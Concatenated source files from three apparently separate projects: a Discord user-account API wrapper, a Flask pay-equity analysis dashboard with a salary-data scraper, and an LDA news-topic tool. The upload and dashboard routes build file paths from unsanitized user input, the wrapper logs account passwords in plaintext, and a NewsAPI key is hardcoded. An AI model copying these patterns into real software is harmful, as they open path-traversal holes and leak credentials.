# return self.s.get(url)
def requestFriend(self,user):
if "#" in user:
url = self.discord+"users/@me/relationships"
body = {"username": user.split("#")[0], "discriminator": int(user.split("#")[1])}
if self.log: Logger.LogMessage('Post -> {}'.format(url))
if self.log: Logger.LogMessage('{}'.format(str(body)))
response = self.s.post(url, data=json.dumps(body))
if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
return response
url = self.discord+"users/@me/relationships/"+user
if self.log: Logger.LogMessage('Put -> {}'.format(url))
response = self.s.put(url, data=json.dumps({}))
if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
return response
def acceptFriend(self,userID):
url = self.discord+"users/@me/relationships/"+userID
if self.log: Logger.LogMessage('Put -> {}'.format(url))
response = self.s.put(url, data=json.dumps({}))
if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
return response
def removeRelationship(self,userID): #for removing friends, unblocking people
url = self.discord+"users/@me/relationships/"+userID
if self.log: Logger.LogMessage('Delete -> {}'.format(url))
response = self.s.delete(url)
if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
return response
def blockUser(self,userID):
url = self.discord+"users/@me/relationships/"+userID
if self.log: Logger.LogMessage('Put -> {}'.format(url))
if self.log: Logger.LogMessage('{}'.format(str({"type":2})))
response = self.s.put(url, data=json.dumps({"type":2}))
if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
return response
'''
Profile Edits
'''
def changeName(self,email,password,name):
url = self.discord+"users/@me"
if self.log: Logger.LogMessage('Patch -> {}'.format(url))
if self.log: Logger.LogMessage('{}'.format(str({"username":name,"email":email,"password":password})))
response = self.s.patch(url, data=json.dumps({"username":name,"email":email,"password":password}))
if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
return response
def setStatus(self,status):
url = self.discord+"users/@me/settings"
if self.log: Logger.LogMessage('Patch -> {}'.format(url))
if(status == 0): # Online
if self.log: Logger.LogMessage('{}'.format(str({"status":"online"})))
response = self.s.patch(url, data=json.dumps({"status":"online"}))
if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
return response
elif(status == 1): # Idle
if self.log: Logger.LogMessage('{}'.format(str({"status":"idle"})))
response = self.s.patch(url, data=json.dumps({"status":"idle"}))
if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
return response
elif(status == 2): #Do Not Disturb
if self.log: Logger.LogMessage('{}'.format(str({"status":"dnd"})))
response = self.s.patch(url, data=json.dumps({"status":"dnd"}))
if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
return response
elif (status == 3): #Invisible
if self.log: Logger.LogMessage('{}'.format(str({"status":"invisible"})))
response = self.s.patch(url, data=json.dumps({"status":"invisible"}))
if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
return response
elif (status == ''):
if self.log: Logger.LogMessage('{}'.format(str({"custom_status":None})))
response = self.s.patch(url, data=json.dumps({"custom_status":None}))
if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
return response
else:
if self.log: Logger.LogMessage('{}'.format(str({"custom_status":{"text":status}})))
response = self.s.patch(url, data=json.dumps({"custom_status":{"text":status}}))
if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
return response
def setAvatar(self,email,password,imagePath): #local image path
url = self.discord+"users/@me"
if self.log: Logger.LogMessage('Patch -> {}'.format(url))
if self.log: Logger.LogMessage('{}'.format(str({"email":email,"password":password,"avatar":"data:image/png;base64,<encoded image data>","discriminator":None,"new_password":None})))
with open(imagePath, "rb") as image:
encodedImage = base64.b64encode(image.read()).decode('utf-8')
response = self.s.patch(url, data=json.dumps({"email":email,"password":password,"avatar":"data:image/png;base64,"+encodedImage,"discriminator":None,"new_password":None}))
if self.log: Logger.LogMessage('Response <- {}'.format(response.text), log_level=LogLevel.OK)
return response
|
[
"/discum/Logger.py",
"/discum/__init__.py",
"/discum/discum.py",
"/discum/gateway/__init__.py",
"/discum/gateway/gateway.py",
"/discum/login/Login.py",
"/discum/user/user.py"
] |
00-00-00-11/Hummingbird
|
from . import dashboard
from . import home
from . import manage
from . import success
from . import upload
from . import dashboardItem
from . import moreInfoCount
from . import moreInfoGender
from . import moreInfoSalary
from . import moreInfoJobs
--- FILE SEPARATOR ---
from flask import Blueprint, render_template, abort
from lib.dataHandler import *
dashboard = Blueprint('dashboard', __name__,
template_folder='templates')
@dashboard.route('/dashboard')
def show():
return render_template('pages/dashboard.html',
size = 4123,
mfRatio = 51,
meanTc = 251222,
jobCount = 5)
--- FILE SEPARATOR ---
from flask import Blueprint, render_template, abort, request
from lib.dataHandler import *
dashboardItem = Blueprint('dashboardItem', __name__,
template_folder='templates')
@dashboardItem.route('/dashboardItem', methods=['GET','POST'])
def samplefunction():
if (request.method == 'POST'):
print(request.form['fileSub'])
with open("blobs/"+request.form['fileSub']+".json") as json_file:
data = json.load(json_file)
print(data)
num = data['count']
ratio = '%.3f'%data['ratio']
averageComp = data['meanTc']
uniqueJobs = data['jobs']
gend = int(data['p_val_g']*1000)/1000
rac = int(data['p_val_race']*1000)/1000
feedback = data['feedback']
# tValue = data['t value']
# permutations = data['data permutations']
return render_template('pages/dashboardItem.html',
size = num,
mfRatio = ratio,
meanTc = averageComp,
jobCount = uniqueJobs,
p_val_g = gend,
p_val_race = rac,
recommendations = feedback) #,
#tVal = tValue,
#dataPermutations = permutations)
else:
return render_template('pages/dashboardItem.html')
--- FILE SEPARATOR ---
from flask import Blueprint, render_template, abort
home = Blueprint('home', __name__,
template_folder='templates')
@home.route('/')
def show():
return render_template('pages/home.html')
--- FILE SEPARATOR ---
from flask import Blueprint, render_template, abort
import os
manage = Blueprint('manage', __name__,
template_folder='templates')
@manage.route('/manage')
def show():
files = os.listdir('blobs')
for i in range(len(files)):
files[i] = files[i][:-5]
return render_template('pages/manage.html', files = files)
--- FILE SEPARATOR ---
from flask import Blueprint, render_template, abort, request
from lib.dataHandler import *
moreInfoJobs = Blueprint('moreInfoJobs', __name__,
template_folder='templates')
@moreInfoJobs.route('/moreInfoJobs', methods=['GET','POST'])
def samplefunction():
print(request.form)
# permutations = data['data permutations']
return render_template('/pages/moreInfoJobs.html') #,
#tVal = tValue,
#dataPermutations = permutations)
--- FILE SEPARATOR ---
from flask import Blueprint, render_template, abort, request
import csvparser
from subprocess import Popen
success = Blueprint('success', __name__,
template_folder='templates')
@success.route('/success', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
f = request.files['file']
f.save('uploads/' + f.filename)
Popen(['python', 'lib/dataHandler.py', 'uploads/'+ f.filename])
return render_template('forms/success.html', name = f.filename)
--- FILE SEPARATOR ---
from flask import Blueprint, render_template, abort
upload = Blueprint('upload', __name__,
template_folder='templates')
@upload.route('/upload')
def show():
return render_template('pages/upload.html')
--- FILE SEPARATOR ---
import csv
import random
from lib import Gender, Job, Race
"""
Generates a CSV file of sample size N.
input:
N- the sample size
Sample_instructions: a dictionary with instructions on how to bias people
{
key- the metric to be unfair about:
value - a dictionary{
key- the group in question:
value- a number that indicates skew. eg 1.15 > 15% higher pay
}
}
global_mean- a global average that is the relative comparison for all individual groups
global_std- a global std for all.
"""
def generateCSV(sample_size, sample_instructions, global_mean, global_std):
answer = list(sample_instructions) + ["wage"]
for person in range(sample_size):
person_attributes = []
weighed_mean = global_mean
for discriminating_factor in list(sample_instructions):
factor_types = sample_instructions[discriminating_factor]
selected_attribute = random.choice(list(factor_types))
weighed_mean *=factor_types[selected_attribute]
person_attributes += [selected_attribute]
person_attributes += [int(100*random.gauss(weighed_mean, global_std))/100]
answer.append(person_attributes)
createCSV(answer)
return answer
def createCSV(lists):
with open('sampledata.csv', 'w', newline='') as f:
thewriter = csv.writer(f)
thewriter.writerow(['race', 'gender', 'job', 'year', 'salary'])
for row in lists:
thewriter.writerow(row)
instruction = {
'race' : {
'white': 1.5,
'black': 1,
'asian': 1.3,
'latino': 0.8,
'indigenous': .8,
'pacific': .9,
},
'gender' : {
'male': 1,
'female': 0.73,
},
'job' : {
'Alcohol Beverage Purchasing Specialist': .5,
'deputy sheriff': 1,
'sheriff': 1.5,
'Executive': 10
}
}
for person in generateCSV(1500, instruction, 100000, 10000):
print (person)
--- FILE SEPARATOR ---
import csv
def parseCSV(file_name):
myList = []
with open(file_name, 'r') as file_o_data:
#csv_data = csv.reader(file_o_data)#gives an iterable
for row in csv.reader(file_o_data):
myList.append(row)
print(myList)
return myList
processed_data = {'M':[],
'F':[]} #gender:annual salary
next(csv_data)
for datapoint in csv_data:
processed_data[datapoint[0]].append(datapoint[1])
print("the average male pay is", sum([int(float(i)) for i in processed_data['M']])/len(processed_data['M']))
"""
Takes DATA, an iterable, and sorts the DATA by the
COLUMN_SORT and returns it as a dictionary where each different type
in COLUMN_GROUP has its relevant COLUMN_SORTs listed as a dictionary value.
"""
def sort_by(data, column_sort, column_group ):
assert len(data)>1, "There is no data in the file!"
header, data = data[0], data[1:]
try:
group_ind = header.index(column_group)
sort_ind = header.index(column_sort)
except ValueError:
return "Error: the request is not represented by the data"
sorted_data = {}
for data_point in data:
grouper = data_point[group_ind]
sort_value = data_point[sort_ind]
if grouper not in sorted_data:
sorted_data[grouper] = [sort_value]
else:
sorted_data[grouper] += [sort_value]
return sorted_data
# test_data = [['money', 'race'], [-100, 'white'], [25000, 'asian'], [26000, 'asian'], [1000000, 'egyptian'], [1000, 'white']]
# sorted_test_data = sort_by(test_data, "money", "race")
"""
filter_group takes in a dataset and column to filter by (creating something like a "race-filter",
then takes in a name of the grouped variable (e.g. white))
filtergroup (test_data, race)(white)
>>> [[-100, 'white'], [1000, 'white']]
"""
# filter_group = lambda dataset, col: lambda var: list(filter (lambda row: row[dataset[0].index(col)] == var, dataset))
# print(filter_group(test_data, "race")("asian"))
def mean_data(sorted_data):
return {grouper: (sum(values)/len(values)) for grouper, values in sorted_test_data.items() }
# print(mean_data(test_data))
"""
Filters a CSV into several Lists, currently supported lists are categories, gender (index 0), annualSalary(index 1), Employee Title (index 2), and race (index 3)
"""
def filterCSV(file_name):
with open(file_name, 'r') as file_o_data:
csv_data = csv.reader(file_o_data) #gives an iterable
categories = []
gender = []
annualSalary = []
race = []
employeeTitle = []
#gender:annual salary
for specData in next(csv_data):
categories.append(specData)
print(categories)
for datapoint in csv_data:
index = 0
for specificData in datapoint:
#print(specificData)
if ("gender" in categories and index == categories.index("gender")):
gender.append(specificData)
elif ("current annual salary" in categories and index == categories.index("current annual salary")):
annualSalary.append(specificData)
elif ("race" in categories and index == categories.index("race")):
race.append(specificData)
if ("employee position title" in categories or "position title" in categories or "job" in categories):
if ("employee position title" in categories):
if (index == categories.index("employee position title")):
employeeTitle.append(specificData)
elif ("position title" in categories):
if (index == categories.index("position title")):
employeeTitle.append(specificData)
elif ("job" in categories):
if (index == categories.index("job")):
employeeTitle.append(specificData)
#elif (index == categories.index("Employee Position Title") or index == categories.index("Position Title")):
# employeeTitle.append(specificData)
index += 1
return [gender, annualSalary, employeeTitle, race]
#gender = 'M' or 'F'
def genderSalaryAVG(arr, seekGender):
gender = arr[0]
annualSalary = arr[1]
if ((seekGender != 'M' and seekGender != 'F') or gender == []):
return
totalAnn = 0
index = 0
count = 0
for data in gender:
if (data.lower() == seekGender.lower() and annualSalary[index] != ''):
totalAnn += float(annualSalary[index])
count += 1
index += 1
print("Average annual salary for gender: "+seekGender+", is "+(str(int(totalAnn/count))))
return (str(int(totalAnn/count)))
def raceAVG(arr, seekRace):
race = arr[3]
annualSalary = arr[1]
if (seekRace == [] or race == [] or annualSalary == []):
return
totalAnn = 0
index = 0
count = 0
for data in race:
if (data.lower() == seekRace.lower() and annualSalary[index] != ''):
totalAnn += float(annualSalary[index])
count += 1
index += 1
print("Average annual salary for race: "+seekRace+", is "+(str(int(totalAnn/count))))
return (str(int(totalAnn/count)))
--- FILE SEPARATOR ---
from enum import Enum
class DataSections(Enum):
RACE = 0
GENDER = 1
JOB = 2
SENIORITY = 3
SALARY = 4
--- FILE SEPARATOR ---
from enum import Enum
class Gender(Enum):
MALE = 0
FEMALE = 1
--- FILE SEPARATOR ---
from enum import Enum
class Job(Enum):
JANITOR = 0
CASHIER = 1
ENGINEER = 2
EXECUTIVE = 3
--- FILE SEPARATOR ---
# Imports
from numpy import loadtxt
from keras.models import Sequential
from keras.layers import Dense
def Learn():
categories = 3
temp = 'generated.csv'
dataset = loadtxt(temp, delimiter=',')
inputs = dataset[:,0:categories]
outputs = dataset[:,categories]
model = Sequential()
model.add(Dense(12, input_dim = categories, activation = 'relu'))
model.add(Dense(8, activation = 'relu'))
model.add(Dense(1, activation = 'sigmoid'))
model.compile(loss = 'binary_crossentropy', optimizer = 'adam', metrics = ['accuracy'])
model.fit(inputs, outputs, epochs = 150, batch_size = 10)
# Evaluation
_, accuracy = model.evaluate(inputs, outputs)
print('Accuracy: %2.f' % (accuracy * 100))
def main():
print("Learn has been activited! It should do nothing.")
main()
--- FILE SEPARATOR ---
from enum import Enum
class Race(Enum):
WHITE = 0
BLACK = 1
ASIAN = 2
LATINO = 3
INDIGENOUS = 4
PACIFIC = 5
--- FILE SEPARATOR ---
from . import csvTasks
from . import Gender
# from . import Learn
--- FILE SEPARATOR ---
import Gender
Gender = Gender.Gender
import Job
Job = Job.Job
import Race
Race = Race.Race
import DataSections
DataSections = DataSections.DataSections
import disparitySearch
import dataHandler
--- FILE SEPARATOR ---
import csv
import random
import math
instruction = {
'race' : {
0: 1.5, # White
1: .9, # Black
2: 1.2, # Asian
3: 0.8, # Latino
4: .7, # Indigenous
5: .8, # Pacific
},
'gender' : {
0: 1, # Male
1: 0.83, # Female
},
'job' : {
0: .5, # Janitor
1: 1, # Cashier
2: 1.5, # Engineer
3: 10 # Executive
},
'year' : {
0: 0.8, # Janitor
1: 0.9, # Cashier
2: 0.95, # Engineer
3: 1 # Executive
}
}
test_instruction = {
'race' : {
0: 1, # White
1: 1, # Black
2: 1, # Asian
3: 1, # Latino
4: 1, # Indigenous
5: 1, # Pacific
},
'gender' : {
0: 1, # Male
1: 1, # Female
},
'job' : {
0: 1, # Janitor
1: 1, # Cashier
2: 1, # Engineer
3: 1 # Executive
},
'year' : {
0: 1, # Janitor
1: 1.2, # Cashier
2: 2, # Engineer
3: 5 # Executive
}
}
def parse(file):
with open(file, 'r') as data:
csvData = csv.reader(data)
return csvData
def generateCSV(sample_size, sample_instructions, global_mean, global_std):
answer = []
for person in range(sample_size):
person_attributes = []
weighed_mean = global_mean
for discriminating_factor in list(sample_instructions):
factor_types = sample_instructions[discriminating_factor]
selected_attribute = random.choice(list(factor_types))
weighed_mean *= factor_types[selected_attribute]
person_attributes += [selected_attribute]
person_attributes += [math.floor(abs(int(100*random.gauss(weighed_mean, global_std))/100))]
answer.append(person_attributes)
createCSV(answer)
return answer
def createCSV(lists):
with open('rlyunfairsampledata.csv', 'w', newline='') as f:
thewriter = csv.writer(f)
thewriter.writerow(['race', 'gender', 'job', 'salary'])
for row in lists:
thewriter.writerow(row)
def main():
for person in generateCSV(1500, instruction, 100000, 10000):
print(person)
--- FILE SEPARATOR ---
import csv
import json
import math
import statistics
import sys
from scipy import stats
import numpy as np
import random
sys.path.append('lib')
import Gender
Gender = Gender.Gender
import Job
Job = Job.Job
import Race
Race = Race.Race
import DataSections
DataSections = DataSections.DataSections
def parse(file_name):
data = []
with open(file_name, 'r') as file:
for row in csv.reader(file):
data.append(row)
if "MONT" in file_name:
mapfn = lambda data_entry: [random.randint(0, 5), int(data_entry[1] == "F"), random.randint(0, 3), random.randint(0,6), int(float(data_entry[2]))]
new_data = [datapoint for datapoint in map(mapfn,data[1:])]
return new_data[1:200]
return data[1:]
def splitCols(data):
race = []
gender = []
job = []
year = []
salary = []
for i in data:
race.append(int(i[0]))
gender.append(int(i[1]))
try:
job.append(int(i[2]))
except ValueError:
job.append(i[2])
year.append(int(i[3]))
salary.append(int(i[4]))
return race, gender, job, year, salary
def singleFilter(labels, values, criteria):
"""
singleFilter: filters a list based on the contents of another list
Paramters:
* labels: a list containing the objects you are searching for
* values: a list containing the values you want to return at
the index the label you are searching for is located
* criteria: an object identical to the type stored in list that will
be compared to objects inside labels
Description:
The function iterates through labels, looking for matches to
criteria, When a match is found, the item located at the same
index in values is added to a new list, which is then returned
after the entire list has been iterated through.
"""
data = []
for i in range(len(labels)):
if criteria == labels[i]:
data.append(values[i])
return data
def mean(lst):
return sum(lst) / len(lst)
def meanOf(labels, values, criteria):
data = singleFilter(labels, values, criteria)
return sum(data) / len(data)
# Find standard deviation
def sigma(lst):
return statistics.stdev(lst)
# Find standard deviation of criteria
def sigmaOf(labels, values, criteria):
data = singleFilter(labels, values, criteria)
return statistics.stdev(data)
# Returns the percentage of criteria in a list
def ratio(lst, criteria):
data = [x for x in lst if x == criteria]
return len(data) / len(lst)
def unique(lst):
return list(dict.fromkeys(lst))
# Generate a dashboard summary
def dashSum(ppl, job, salary):
return len(ppl), 100*ratio(ppl, Gender.MALE.value), math.floor(mean(salary)), len(unique(job))
def findAllT(race, gender, job, year, salary):
allT = {}
allT['race'] = {}
for r in range(len(Race)):
for i in range(r + 1, len(Race)):
raceListA = singleFilter(race, salary, r)
raceListB = singleFilter(race, salary, i)
allT['race'][(r + 1) * (i + 1)] = stats.ttest_ind(raceListA, raceListB)
allT['gender'] = {}
for g in range(len(Gender)):
for i in range(g + 1, len(Gender)):
genderListA = singleFilter(gender, salary, g)
genderListB = singleFilter(gender, salary, i)
allT['gender'][(g + 1) * (i + 1)] = stats.ttest_ind(genderListA, genderListB)
allT['job'] = {}
for j in range(len(Job)):
for i in range(j + 1, len(Job)):
print(i, j)
jobListA = singleFilter(job, salary, j)
jobListB = singleFilter(job, salary, i)
print (jobListA, jobListB)
print('endtest')
allT['job'][(j + 1) * (i + 1)] = stats.ttest_ind(jobListA, jobListB)
return allT
def pt_score_calc(data1, data2):
c1 = (sigma(data1)**2)/len(data1)
c2 = (sigma(data2)**2)/len(data2)
m1 = mean(data1)
m2 = mean(data2)
denom= math.sqrt(c1+c2)
tVal = (m1-m2)/denom
return tVal
def search_disparity(data, col, first, second):
data = parse(data)
data = splitCols(data)
data1 = singleFilter(data[col.value], data[DataSections.SALARY.value], first)
if second > -1:
data2 = singleFilter(data[col.value], data[DataSections.SALARY.value], second)
else:
data2 = data[DataSections.SALARY.value]
return pt_score_calc(data1, data2)
"""Takes an interable and finds all possible, non duplicating possible pairs
returns: a list of tuples
"""
def generate_combinations(iterable):
result = []
avoid = []
for iteration in iterable:
for iteration2 in iterable:
if iteration2 not in avoid and iteration2 is not iteration:
result += [(iteration, iteration2)]
avoid += [iteration]
return result
"""
def complete_data_analysis(datasetURL):
else:
results = {}
#binary gender analysis
results[(Gender.MALE, Gender.FEMALE)] = search_disparity('sampledata.csv', DataSections.GENDER, Gender.MALE.value, Gender.FEMALE.value)
#race analysis
for combination in generate_combinations(Race):
results[combination] = search_disparity(datasetURL, DataSections.RACE, combination[0].value, combination[1].value )
#job analysis
for combination in generate_combinations(Job):
results[combination] = search_disparity(datasetURL, DataSections.JOB, combination[0].value, combination[1].value )
return results
"""
def main():
print("Begun handling of data with", sys.argv)
argumentList = sys.argv[1:]
data = parse(argumentList[0])
# ['race', 'gender', 'job', 'year', 'salary']
race, gender, job, year, salary = splitCols(data)
count, ratio, meanTc, jobs = dashSum(gender, job, salary)
maleSalary = singleFilter(gender, salary, Gender.MALE.value)
maleSalary = sum(maleSalary) / len(maleSalary)
femaleSalary = singleFilter(gender, salary, Gender.FEMALE.value)
femaleSalary = sum(femaleSalary) / len(femaleSalary)
print(maleSalary)
print(femaleSalary)
# t, p = stats.ttest_ind(maleSalary, femaleSalary)
# print("t and p:", t, p)
allT = findAllT(race, gender, job, year, salary)
print(allT)
p_val_g= abs(allT["gender"][2][1])
p_val_race= abs(min([allT['race'][key] for key in allT['race']][1]))
print("p vals", p_val_g, p_val_race)
# tVal = search_disparity(argumentList[0], DataSections.GENDER, Gender.MALE.value, Gender.FEMALE.value)
# comprehensive_data_analysis = complete_data_analysis(argumentList[0])
recommendations = []
if (ratio < 45):
recommendations.append("Your company favors women in the hiring process (by about "+(str2(2*abs(float(50 - ratio))))+"%)! Try to balance out your company!")
elif (ratio > 55):
recommendations.append("Your company favors men in the hiring process (by about "+(str(2*abs(float(50 - ratio))))+"%)! Try to balance out your company!")
else:
recommendations.append("Fantastic job in maintaining a balance of both men and women in your workplace! Keep it up.")
if (jobs < 10):
recommendations.append("Your company is lacking a diverse set of jobs. Try to compartamentalize your employees' duties more!")
elif (jobs >= 10):
recommendations.append("Great job maintaining a diverse set of jobs for your employees!")
if (maleSalary - femaleSalary > 9000):
recommendations.append("Your company has a bias when it comes to paying men over women. (A difference of $"+str(abs(int(femaleSalary - maleSalary)))+") Try to balance out your payrolls!")
elif (femaleSalary - maleSalary > 9000):
recommendations.append("Your company has a bias when it comes to paying women over men. (A difference of $"+str(abs(int(femaleSalary - maleSalary)))+") Try to balance out your payrolls!")
else:
recommendations.append("Great job maintaing balanced and equal payrolls for all of your employees!")
dump = {
"count": count,
"ratio": ratio,
"meanTc": meanTc,
"jobs": jobs,
"t_vals": allT,
"p_val_g": p_val_g,
"p_val_race": p_val_race,
"feedback": recommendations,
# "t value": tVal,
# "permutations": comprehensive_data_analysis,
#"p value": pVal,
}
with open('blobs/' + argumentList[0][7:-3] + "json", 'w') as file:
json.dump(dump, file)
print("[dataHandler] saved!")
if len(sys.argv) > 1:
main()
--- FILE SEPARATOR ---
import csv
from datetime import datetime
import json
import requests
from time import sleep
# url = "https://www.fedsdatacenter.com/federal-pay-rates/output.php?sColumns=,,,,,,,,&iDisplayStart=0&iDisplayLength=100"
url_prepend = "https://www.fedsdatacenter.com/federal-pay-rates/output.php?sColumns=,,,,,,,,&iDisplayStart="
url_append = "&iDisplayLength=100"
payload = {}
headers= {}
today = datetime.today()
date = str(today.year) + "-" + str(today.month) + \
"-" + str(today.day) + "-" + str(today.hour) + str(today.minute)
table = open('FedsDataCenter-' + date + '.csv', 'w', newline='')
writer = csv.writer(table, delimiter=',')
writer.writerow(['name', 'grade', 'plan', 'salary', 'bonus', 'agency', 'location', 'occupation', 'fy'])
start = 12300
end = 21083
pages = 21083
for i in range(start, end):
print("Downloading page", i + 1, "of", pages,"..." ,end=" ")
url = url_prepend + str(i * 100) + url_append
response = requests.request("GET", url, headers=headers, data = payload)
data = response.text.encode('utf8')
parsed = json.loads(data)
for item in parsed['aaData']:
# print(item)
writer.writerow(item)
print("Done!")
if (i + 1) % 1000 == 0:
print("Sleeping for a half minute...")
sleep(30)
continue
if (i + 1) % 100 == 0:
print("Sleeping for a 5 seconds...")
sleep(5)
continue
# print(response.text.encode('utf8'))
|
[
"/controllers/__init__.py",
"/controllers/dashboard.py",
"/controllers/dashboardItem.py",
"/controllers/home.py",
"/controllers/manage.py",
"/controllers/moreInfoJobs.py",
"/controllers/success.py",
"/controllers/upload.py",
"/csvgenerator.py",
"/csvparser.py",
"/lib/DataSections.py",
"/lib/Gender.py",
"/lib/Job.py",
"/lib/Learn.py",
"/lib/Race.py",
"/lib/__init__.py",
"/lib/completeDataAnalysis.py",
"/lib/csvTasks.py",
"/lib/dataHandler.py",
"/payroll-datasets/scripts/FedsDataCenter.py"
] |
00-00-00-11/News-Suggestions-Using-ML
|
from tqdm import tqdm
import numpy as np
import random, math, time
from scipy.special import psi
from preprocessing import preprocessing, maxItemNum
from retrieve_articles import retrieve_articles
docs, word2id, id2word = preprocessing()
# The number of documents we'll be using to train the model.
N = len(docs)
# number of distinct terms
M = len(word2id)
# number of topics
T = 10
# iteration times of variational inference, judgment of the convergence by calculating likelihood is omitted
iterInference = 35
# iteration times of variational EM algorithm, judgment of the convergence by calculating likelihood is omitted
iterEM = 50
# initial value of hyperparameter alpha
alpha = 5
# sufficient statistic of alpha
alphaSS = 0
# the topic-word distribution (beta in D. Blei's paper)
# Passing the list [T,M] in as an argument for np.zeros creates a matrix of T-by-M zeros.
varphi = np.zeros([T, M])
# topic-word count, this is a sufficient statistic to calculate varphi
nzw = np.zeros([T, M])
# topic count, sum of nzw with w ranging from [0, M-1], for calculating varphi
nz = np.zeros([T])
# inference parameter gamma
gamma = np.zeros([N, T])
# inference parameter phi
phi = np.zeros([maxItemNum(N, docs), T])
def initializeLdaModel():
for z in range(0, T):
for w in range(0, M):
nzw[z, w] += 1.0/M + random.random()
nz[z] += nzw[z, w]
updateVarphi()
# update model parameters : varphi (the update of alpha is ommited)
def updateVarphi():
for z in range(0, T):
for w in range(0, M):
if(nzw[z, w] > 0):
varphi[z, w] = math.log(nzw[z, w]) - math.log(nz[z])
else:
varphi[z, w] = -100
# update variational parameters : gamma and phi
def variationalInference(docs, d, gamma, phi):
phisum = 0
#Creates an numpy array containing a list of zeros with length equal to the number of topics.
oldphi = np.zeros([T])
digamma_gamma = np.zeros([T])
for z in range(0, T):
gamma[d][z] = alpha + docs[d].wordCount * 1.0 / T
digamma_gamma[z] = psi(gamma[d][z])
for w in range(0, len(docs[d].itemIdList)):
phi[w, z] = 1.0 / T
for iteration in tqdm(range(0, iterInference)):
for w in range(0, len(docs[d].itemIdList)):
phisum = 0
for z in range(0, T):
oldphi[z] = phi[w, z]
phi[w, z] = digamma_gamma[z] + varphi[z, docs[d].itemIdList[w]]
if z > 0:
phisum = math.log(math.exp(phisum) + math.exp(phi[w, z]))
else:
phisum = phi[w, z]
for z in range(0, T):
phi[w, z] = math.exp(phi[w, z] - phisum)
gamma[d][z] = gamma[d][z] + docs[d].itemCountList[w] * (phi[w, z] - oldphi[z])
digamma_gamma[z] = psi(gamma[d][z])
# initialization of the model parameter varphi, the update of alpha is ommited
initializeLdaModel()
print("Checkpoint") #Track Preprocessing Progress
# variational EM Algorithm
for iteration in tqdm(range(0, iterEM)):
nz = np.zeros([T])
nzw = np.zeros([T, M])
alphaSS = 0
# EStep
for d in tqdm(range(0, N)):
variationalInference(docs, d, gamma, phi)
gammaSum = 0
for z in range(0, T):
gammaSum += gamma[d, z]
alphaSS += psi(gamma[d, z])
alphaSS -= T * psi(gammaSum)
for w in range(0, len(docs[d].itemIdList)):
for z in range(0, T):
nzw[z][docs[d].itemIdList[w]] += docs[d].itemCountList[w] * phi[w, z]
nz[z] += docs[d].itemCountList[w] * phi[w, z]
# MStep
updateVarphi()
# calculate the top 10 terms of each topic
topicwords = []
maxTopicWordsNum = 10
for z in range(0, T):
ids = varphi[z, :].argsort()
topicword = []
for j in ids:
topicword.insert(0, id2word[j])
topicwords.append([topicword[0 : min(10, len(topicword))],j])
counter = 1
for item in topicwords:
print(f"Topic {counter}: {item[0]}")
counter+=1
#print(phi)
print('Complete.')
#Write results to file.
with open("results.txt","w+") as file:
for index, item in enumerate(topicwords):
file.write(f"Topic {index+1}: {item[0]} \n")
for item in topicwords:
file.write('\n'+' '.join(item[0])+'\n')
query = ' '.join(item[0])
file.write(retrieve_articles(query))
time.sleep(5)
--- FILE SEPARATOR ---
from newsapi import NewsApiClient
# Init
def retrieve_articles_newsapi():
newsapi = NewsApiClient(api_key='2050df7a6a014501a04c5f42fa6eef54')
# /v2/top-headlines
top_headlines = newsapi.get_top_headlines(q='sector OR big OR corporate OR product OR investor OR pointed OR gavekal OR sovereign OR vincent OR louis',
sources='bbc-news,the-verge',
language='en')
# /v2/everything
all_articles = newsapi.get_everything(q='reality OR long OR central OR capital OR political OR dollars OR trading OR algorithmic OR banks OR released',
sources='bbc-news, the-verge, the-wall-street-journal, the-washington-post, the-hill',
domains='bbc.co.uk, techcrunch.com, ft.com, economist.com, wsj.com, thewashingtonpost.com',
from_param='2019-07-18',
to='2019-08-12',
language='en',
sort_by='relevancy')
# /v2/sources
sources = newsapi.get_sources()
for article in all_articles['articles']:
print(article)
print('\n')
retrieve_articles_newsapi()
--- FILE SEPARATOR ---
from tqdm import tqdm
from split_into_sentences import split_into_sentences
import numpy as np
import codecs, jieba, re, random, math
from scipy.special import psi
# wordCount : the number of total words (not terms)
# itemIdList : the list of distinct terms in the document
# itemCountList : the list of number of the existence of corresponding terms
class Document:
def __init__(self, itemIdList, itemCountList, wordCount):
self.itemIdList = itemIdList
self.itemCountList = itemCountList
self.wordCount = wordCount
# Preprocessing - filter out stopwords, handle segmentation, and use the class Document to represent all documents in the text sample.
def preprocessing():
# read in all stopwords to be filtered out.
file = codecs.open('stopwords.dic','r','utf-8')
stopwords = [line.strip() for line in file]
#print(stopwords)
file.close()
# the document to read and produce topics from
with open('sample.txt','r') as fh:
all_lines = fh.readlines()
str_all_lines = ' '.join(all_lines).replace('\n','')
raw_documents = split_into_sentences(str_all_lines)
# Check that sentence splitting has worked.
# print(raw_documents)
# Group 4 sentences as a document.
documents = []
i=0
while i < len(raw_documents)-4:
documents.append(raw_documents[i]+'\n'+raw_documents[i+1]+raw_documents[i+2]+'\n'+raw_documents[i+3]+'\n')
i+=4
docs = []
word2id = {}
id2word = {}
currentWordId = 0
for document in documents:
#word2Count is a dictionary, essentially a hashmap with the number of occurrences of each word in a sentence.
word2Count = {}
# Create generator objects for each word in the string, cuts on whole words and punctuation.
segList = jieba.cut(document)
for word in segList:
word = word.lower().strip()
# Get rid of items that are punctuation, numbers, or stopwords.
if len(word) > 1 and not re.search('[0-9]', word) and word not in stopwords:
if word not in word2id:
word2id[word] = currentWordId
id2word[currentWordId] = word
currentWordId += 1
if word in word2Count:
word2Count[word] += 1
else:
word2Count[word] = 1
itemIdList = []
itemCountList = []
wordCount = 0
for word in word2Count.keys():
itemIdList.append(word2id[word])
itemCountList.append(word2Count[word])
wordCount += word2Count[word]
